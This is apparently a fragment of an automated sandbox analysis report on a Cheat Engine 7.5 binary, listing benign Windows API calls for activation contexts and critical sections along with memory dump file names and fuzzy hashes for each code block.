                                                                                                                                                                                                                                        • Part of subcall function 6B4CDD74: DeactivateActCtx.KERNEL32(?,6B4CD9C3,6B638ED4,6B69429C,DeactivateActCtx,00000000,?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CDD95
                                                                                                                                                                                                                                        • Part of subcall function 6B4CDD74: GetProcAddress.KERNEL32(00000000,00000000), ref: 6B4CDDA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressDeactivateFindProcSectionString
                                                                                                                                                                                                                                      • String ID: 0#Lk$FindActCtxSectionStringW
                                                                                                                                                                                                                                      • API String ID: 3637780246-1165226017
                                                                                                                                                                                                                                      • Opcode ID: a59d97419015a5e8f6ce9f5ad42ee1abb87b4a23911de1194acf05b0513a8da7
                                                                                                                                                                                                                                      • Instruction ID: 5f55b19f2e0f693db623fa39ecd698c840c6f86997cdb438e5d846afa03f8343
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a59d97419015a5e8f6ce9f5ad42ee1abb87b4a23911de1194acf05b0513a8da7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E06D7694553AAB8F226E829D00C9B3F25BB05AA07004055FA1866231C776CC209BE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeactivateActCtx.KERNEL32(?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CD9DD
                                                                                                                                                                                                                                        • Part of subcall function 6B4CDD74: DeactivateActCtx.KERNEL32(?,6B4CD9C3,6B638ED4,6B69429C,DeactivateActCtx,00000000,?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CDD95
                                                                                                                                                                                                                                        • Part of subcall function 6B4CDD74: GetProcAddress.KERNEL32(00000000,00000000), ref: 6B4CDDA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Deactivate$AddressProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$DeactivateActCtx
                                                                                                                                                                                                                                      • API String ID: 1847594590-1065500476
                                                                                                                                                                                                                                      • Opcode ID: cada74f006a78d070d4607fbba46e30235c5e8f6a6dfe489dae7b473a22f4b16
                                                                                                                                                                                                                                      • Instruction ID: 5e141ba880db0b43da6b4c6ea362b2c1fbb3f8a7d0308cba9f766c86ef3ed617
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cada74f006a78d070d4607fbba46e30235c5e8f6a6dfe489dae7b473a22f4b16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38E08C7698193A6BCF223E569800D8BBF64FA41BA53014156FC19AB220C77ADC1087E1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ActivateActCtx.KERNEL32(?,6B4CDD3B,0000000C,-00000034,?,6B4D33E8,00000000,6B67C1E8,00000010,6B4D3F31,00000000,?,00000000), ref: 6B4CD88D
                                                                                                                                                                                                                                        • Part of subcall function 6B4CDD74: DeactivateActCtx.KERNEL32(?,6B4CD9C3,6B638ED4,6B69429C,DeactivateActCtx,00000000,?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CDD95
                                                                                                                                                                                                                                        • Part of subcall function 6B4CDD74: GetProcAddress.KERNEL32(00000000,00000000), ref: 6B4CDDA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ActivateAddressDeactivateProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$ActivateActCtx
                                                                                                                                                                                                                                      • API String ID: 3239892334-1248373386
                                                                                                                                                                                                                                      • Opcode ID: 7c5d3ac089f1efdd173b8a417c54bb0cbeeada0e526b038cb457538c31fd3bad
                                                                                                                                                                                                                                      • Instruction ID: 968b4d2d24d0439f55af09b876e078d9eab131410de6526001140147136760a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c5d3ac089f1efdd173b8a417c54bb0cbeeada0e526b038cb457538c31fd3bad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE08672D81535678F213E97CC10D8B7F68FA11AA13014065FC14A7320C775DC108BF1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6B69434C,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A5E
                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(6B694330,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A72
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6B69434C,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A8C
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6B69434C,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A97
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3969253408-0
                                                                                                                                                                                                                                      • Opcode ID: 870e29439619bbe02851cf42c96259c11ea691c18060df70913ae7ea248b3e63
                                                                                                                                                                                                                                      • Instruction ID: f4ad808b9bf52799393ad2c14afe8f0ebd5b546602e5851c10041ab5709cdb41
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 870e29439619bbe02851cf42c96259c11ea691c18060df70913ae7ea248b3e63
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19F090327042159FEB30AFA6C858E9AB768EF067753454469E815A7320C739E8058BA0